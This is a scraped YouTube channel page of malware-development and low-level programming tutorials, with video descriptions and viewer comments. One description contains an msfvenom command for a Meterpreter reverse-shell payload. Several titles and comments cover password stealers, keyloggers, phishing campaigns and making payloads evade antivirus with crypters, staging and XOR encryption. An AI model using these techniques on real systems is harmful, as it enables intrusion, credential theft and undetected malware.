- 32
- 245 420
screeck
เข้าร่วมเมื่อ 10 ส.ค. 2016
Hi everyone!
I'm a 19yo cybersecurity student with a dream of becoming a malware analyst. On this channel I'll be sharing what I learn, all my ups and downs. Subscribe if you wanna follow my journey.
Contact:
Discord: @screeck
Twitter/X: @_screeck
I'm a 19yo cybersecurity student with a dream of becoming a malware analyst. On this channel I'll be sharing what I learn, all my ups and downs. Subscribe if you wanna follow my journey.
Contact:
Discord: @screeck
Twitter/X: @_screeck
CREATE Your Own C2 Framework from Scratch
What’s up everyone, welcome to the first episode of the new series where we’ll build a simple C2 framework from scratch. Subscribe so you don't miss any new episodes.
🖤 SUBSCRIBE 🖤
Twitter/X:
▶ _screeck
Code on github:
▶ github.com/screeck/BigCat
Timestamps:
0:00 ▶The plan
3:16 ▶Project setup
4:35 ▶app.py
10:05 ▶layout & welcome
17:15 ▶payloads & listeners
music:
th-cam.com/video/0Y0iKIKOHf0/w-d-xo.html
🖤 SUBSCRIBE 🖤
Twitter/X:
▶ _screeck
Code on github:
▶ github.com/screeck/BigCat
Timestamps:
0:00 ▶The plan
3:16 ▶Project setup
4:35 ▶app.py
10:05 ▶layout & welcome
17:15 ▶payloads & listeners
music:
th-cam.com/video/0Y0iKIKOHf0/w-d-xo.html
มุมมอง: 795
วีดีโอ
Bubble sort in Assembly | Tutorial for beginners
มุมมอง 1.9Kหลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone! I’m back with another assembly programming tutorial, this time I’m gonna show you how to implement bubble sort. Feel free to ask questions in comments or in the Discord community. vcvars32: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxil...
How to use WindowsAPI functions in Assembly
มุมมอง 1.1K2 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone, today I’m gonna show you how to use Windows API functions in assembly. We’ll read from file, alocate memory and then display the file content inside a message box. vcvars32: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build link....
Reverse engineering obfuscation algorithm | Solving Crackmes #2
มุมมอง 1.4K2 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, today we gonna be solving another crackme but just before we start I wanna share with you an idea that I have. Coz if you are wathing this video I assume you wanna learn reverse engineering, just like me. And I think it would be fun to learn togather so I...
OS development 101 - How to make a bootloader part 3 - load kernel.c
มุมมอง 4.7K3 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, welcome to the third part of bootloader development mini-servies. In todays video we gonna load kernel from memory and setup cross compiler so that you we can use C to program the kernel. If you didnt watch part 1 and 2 definitly do that before continuing...
OS development 101 - How to make a bootloader part 2 - Protected Mode
มุมมอง 6K3 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, welcome to the seccond part of bootloader development mini-series. In todays video we gonna implement Global Descriptor Table and load 32 bit Protected Mode. Make sure you watch part1: ▶th-cam.com/video/E_n0VtGSZQY/w-d-xo.html Enjoy! 🖤 SUBSCRIBE 🖤 Twitter...
OS development 101 - How to make a bootloader part 1 - Hello World
มุมมอง 88K3 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Welcome to the first video in my new mini-series about bootloader development. I’m planning to make 3 videos in total (maybe more, we’ll see how it goes). Topics that will be covered in the series: - Real Mode - Protected Mode - BIOS - Global Descriptor Table - CHS - Loadin...
How to write your first malware as a beginner
มุมมอง 20K3 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj ⚠️Ethical concideration - pleas read⚠️ This video is for educational purposes on Some people would say that building malware is unethical and wrong. Well, it all depends. If you wanna fight a tank you need to know how it works, you need to know it’s weakneses. And by buindi...
How does malware detect virtual machines?
มุมมอง 10K4 หลายเดือนก่อน
#malware #windows10 #programming I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj 🔍 Ever wondered how malware detects if it's running in a virtual machine? 🖥️ In this video, I’ll show you a simple yet crucial technique that malware uses to complicate analysis. We’ll dive into the Windows Registry to uncover special keys u...
What are Processes? | Windows Internals
มุมมอง 9544 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Discover the intricacies of Windows processes in this detailed video! We'll explore what a process is, how processes are created, and delve into their internals. Learn about process creation functions like CreateProcess(), the EPROCESS and KPROCESS structures, and how to us...
Automated vulnerability scanning with Nessus in Kali Linux
มุมมอง 8584 หลายเดือนก่อน
#hacker #computerscience #tutorial #cybersecurity I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What's up, everyone! In today's video, I'm going to show you how to use Nessus to automatically detect vulnerabilities in your network. This simple tutorial will give you a brief introduction, so you can explore this powerfu...
Understanding Windows PE file format | Windows Internals
มุมมอง 8714 หลายเดือนก่อน
#windows #programming #coding #computerscience I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone! 🚀 In today's video, we’re diving deep into the Portable Executable (PE) file format, an essential component of the Windows operating system. Whether you’re a software developer, cybersecurity enthusiast, or ...
Using Windows Services in Malware Development
มุมมอง 6464 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone, I’m gonna show you how Windows Services can be used in Malware development. Be aware that this video is for educational purposes only. Generate payload with this command: msfvenom arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.130 LPORT=...
Reverse engineering with x64dbg tutorial | Solving Crackmes #1
มุมมอง 7K5 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone, today I’m gonna show you how to reverse engineer a simple crackme using x64dbg . Crackmes are chellenges for reverse engenieers to practice there skills. They can be simple like the one we gonna solve today or very complicated. You can download thiousend...
Start coding in ASSEMBLY (tutorial for beginners)
มุมมอง 2.5K6 หลายเดือนก่อน
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Welcome to my x86 Assembly tutorial! This video is perfect for beginners looking to dive into low-level programming. In this tutorial, we'll cover everything you need to start your journey in assembly language: Setup the Environment: Learn how to set up your development env...
Learning malware analysis on WannaCry (static & dynamic)
มุมมอง 7676 หลายเดือนก่อน
Learning malware analysis on WannaCry (static & dynamic)
YOU have to KNOW this Windows API functions
มุมมอง 1.1K6 หลายเดือนก่อน
YOU have to KNOW this Windows API functions
Payload staging | Malware development
มุมมอง 8706 หลายเดือนก่อน
Payload staging | Malware development
How to build a Malware Analysis lab in 2024 (guide)
มุมมอง 1.5K7 หลายเดือนก่อน
How to build a Malware Analysis lab in 2024 (guide)
How to create YOUR own Antivirus software [Python & C] | Part 2
มุมมอง 1.9K7 หลายเดือนก่อน
How to create YOUR own Antivirus software [Python & C] | Part 2
How to create YOUR own Antivirus software [Python & C] | Part 1
มุมมอง 7K7 หลายเดือนก่อน
How to create YOUR own Antivirus software [Python & C] | Part 1
How to make a password stealer in C [code in description]
มุมมอง 2.9K7 หลายเดือนก่อน
How to make a password stealer in C [code in description]
Reverse shell with Thread Hijacking | Malware development
มุมมอง 7818 หลายเดือนก่อน
Reverse shell with Thread Hijacking | Malware development
This malware will ENCRYPT your files!
มุมมอง 1.5K9 หลายเดือนก่อน
This malware will ENCRYPT your files!
Executing shellcode in memory | Malware Development
มุมมอง 4.2K10 หลายเดือนก่อน
Executing shellcode in memory | Malware Development
Dll Injection attack with Keylogger! | Malware Development
มุมมอง 4.5K11 หลายเดือนก่อน
Dll Injection attack with Keylogger! | Malware Development
O Data, All Ye Faithful | tryhackme advent of cyber 2023
มุมมอง 1.1K11 หลายเดือนก่อน
O Data, All Ye Faithful | tryhackme advent of cyber 2023
How to create a phishing campaign with Gophish
มุมมอง 64K11 หลายเดือนก่อน
How to create a phishing campaign with Gophish
?
so you just made a code that creates a thread to a process that is actually talking with your backend server?(cool)
i'm actually in grade 12 and want to make a project about cyber security and i found this topic interesting and so here i am i like ur content bro hope i will learn more from you.......
Which extension you're using for the syntax highlighting?
bro your quality is bad and we barely see what your typing on the screen and you talk too fast ,nice content tho but i could barely understand.
Im just trying to set this up for the website so i can send the link through sms but i cant seem to get the website to load any suggestions?
Continue please
hey, can you please increase the coding font size
Hi, I'm from Brazil and I was amazed by your content. I study operating systems, assembly, C/C++ and your video helped me understand how the boot process occurs.
thanks man. we need more tutorial like this that explains each instruction carefully.
U could show how it boots
How can we make it that make it send the logs to gmail?
Hwıd kontrollü bir exe dosyasının şifresini öğrenmek mümkün mü ?
Congrats. You know way more that I did when I was your age. And I already knew quite a lot, when I was your age.
Only if I have microscope to see your videos.Use big fonts for TH-cam, just look how Laith Harb did or Explaning Computers.
#qution mume supari nikal ke bat karo 🚩🚩🚩🚩
I'm almost sure you're polish xD
are you from poland.? :-)
On a PDP8 there was no need to do so, just flip the switches correctly and press the load button each time, and viola, the absolute loader (paper) tape was invoked! Blimey, those were the days, Lanchester Polytechnic, circa. 1978... So Simples... (:-)
The content is good but unless you want to make everyone pinch and zoom or expect us to have 80" tvs you might consider upping the font size in the terminal and vscode. When you opened vscode I thought "dang I can almost read that compared to the terminal commands"....then you promptly shrunk the font like 2-3 sizes All this monitor and you're using like the left 10% :)
it all starts with the cpu . When the cpu receives power it has the address of the bios and begins executing bios code
So I have a question since im in Malware development and in fairly new but doesnt the PID change everytime you load the computer and wouldnt you want the dll to self inject. I know this is for demonstration purposes but im just curious
Great! Out of curiosity, what sources did you use to learn these concepts?
Didn't need three videos in 1978 to learn/understand, just a paper tape, a paper tape punch and a PDP8! Mega simples... ):-)
This is very cool.
That "Limte" comment that you don't notice even after moving it twice, and copying it once! XD
ChatGPT is great tool. Best developer friend.
So much easier to understand than python...
can you provide all comands
Tired amateur writes a bootloader.
I'm currently working on a personal project for school, where I'm creating a C2 framework. For the payload generation feature, I'm preparing a template RAT and modifying the IP address and port number when outputting using CreateFile. If possible, please introduce how to code DNS tunneling.
@@サムライエッジ-x1e bro u can just use a RAT to create a exe file and than u can make it FUD using a crypter but the crypter should be private
@@RaGhav363 Since I will be performing staging and reflective loading without a disk drop, it should be sufficient to use simple encryption for the RAT binary. However, considering the possibility that the stager may be caught by antivirus software, I will consider using packers or crypters as you suggested.
@@サムライエッジ-x1e but the crypter or packer should be private and not publically available one
@@サムライエッジ-x1e ur IG bro ?
@@RaGhav363 Are you talking about Instagram?I don't use it.
Instead of installing cross compiler, you could install Zig and use it as a build tool (and if you have zig you may as well write your kernel in it ;) )
And this is why Intel sucks! The amount of crap you need to do to get it into protected mode with linear addressing is idiotic. All other CPUs is just trivial. "If you have never used Makefile...." than you shouldn't be let near bare metal systems :) In bootloader size matters so you are better off doing xor ax,ax saves a byte ;) and cli clears the interrupt enable flag and sti sets the interrupt enable flag and depending on that flag interrupts are handled or not
Now make one crypter tutorial for obfuscation and making it FUD. Or maybe crack a publically available Packer and make it FUD
Yh we need a video
@@deethekingstevens7146 yeah bro for sure specially how we we can make publically available Packer FUD.
You can mostly evade detection from MsDefender using staging, reflective DLL injection, and simple XOR encryption.
it was a bit hard to understand. Is their any code changing I need to do?
Its showing error after launching the campain
how to execute this on RHEL 9?
One thing that I don't understand is why everyone still uses the #ifndef style preprocessor macros. Yes, this is how K&R did it when they carved C into some stone plates. But for the last 20 years at least, all relevant compilers supported #pragma once as the first line in the .h file as a much cleaner alternative. Every C tutorial lists this as "yeah, you can do this, but it's not widely supported"... Yes, this may have been true at some point, but it no longer is. The big advantage of #pragma once is that you don't create arbitrary C preprocessor defines, which clutter up your global preprocessor namespace. It gets even rose, when you imagine, your project grows, and you end up with two haders using the same #define. Let's say, you gut a defs.h file in two parts of your project, both use #ifndef DEFS_H... all works well, until somehow due to massive include chains, both end up being included by one compilation unit. And then you start to figure out why it doesn't work. With #pragma once you don't need to worry about it, as the preprocessor will keep track of what has been included and what hasn't so far.
Hmm... looks like babysteps to me ;)
I have one exe. Its like challenge. Make a video about it. I will give you password as well.. but you will make tutorial video on how to open it without password and next extract all adb commands from it.
This is very cool. I recognized some of the opcodes from my experimenting on and off a few years ago. Great work. Subbed.
I get the error: ./src/kernel.asm:4: error: parser: instruction expected Please help
Gross. I see a huge gross nerd. Adblocker is awesome for times like this. I can see this gross nerd working for the US gov writing malware for windows products to keep the anti-virus companies in business.
LOL!! Hes using windows. LOL! Script kiddie pretending to be a pro. LoL!
Bro, can you cover Windows Registry hacking BRO
It was amazing, I enjoyed every second of it. Thx Mate!!
well i think for x86 as the thumbnail suggest the system call look like "int 80" not syscall for x64 we write syscall
;For Assembly x64 Linux section .data numbers db 2, 12, 0, 3, 8, 98, 69 len equ $ - numbers newline db 0xa comma db ',' section .bss buffer resb 4 section .text global _start _start: mov rcx, len dec rcx outer_loop: push rcx mov rsi, numbers inner_loop: mov al, [rsi] cmp al, [rsi+1] jle next ; Swap xchg al, [rsi+1] mov [rsi], al next: inc rsi loop inner_loop pop rcx loop outer_loop ; Print sorted array mov r12, 0 ; counter print_loop: movzx rax, byte [numbers + r12] ; Convert number to ASCII mov rdi, buffer call itoa ; Print number mov rax, 1 mov rdi, 1 mov rsi, buffer mov rdx, 4 ; maximum 3 digits + null terminator syscall ; Print comma or newline inc r12 cmp r12, len je print_newline mov rax, 1 mov rdi, 1 mov rsi, comma mov rdx, 1 syscall jmp continue_print print_newline: mov rax, 1 mov rdi, 1 mov rsi, newline mov rdx, 1 syscall jmp exit continue_print: cmp r12, len jl print_loop exit: ; Exit mov rax, 60 xor rdi, rdi syscall ; Function to convert integer to ASCII ; Input: RAX = integer to convert ; RDI = pointer to output buffer itoa: add rdi, 3 mov byte [rdi], 0 mov rcx, 10 .loop: xor rdx, rdx div rcx add dl, '0' dec rdi mov [rdi], dl test rax, rax jnz .loop ret
UPDATE I made a mistake at the end of the code. The syscall obviously doesn't work on Windows because it's a Linux syscall. I found this call somewhere and copied and pasted it into my code without thinking. Sorry, my bad. There should be a call to ExitProcess funciton from Kernel32.dll
You cannot call a linux syscall on Windows.
Yes, you're right, I'm dumb
@@screeck No, you're not. I also made the same mistake once upon a time. On Windows, you don't make syscalls directly in usermode. Instead, you call the user-mode APIs such as ExitProcess (IIRC), which calls a Native API function (functions located in ntdll.dll), which actually performs a syscall. (I hate Windows' abstraction hell.)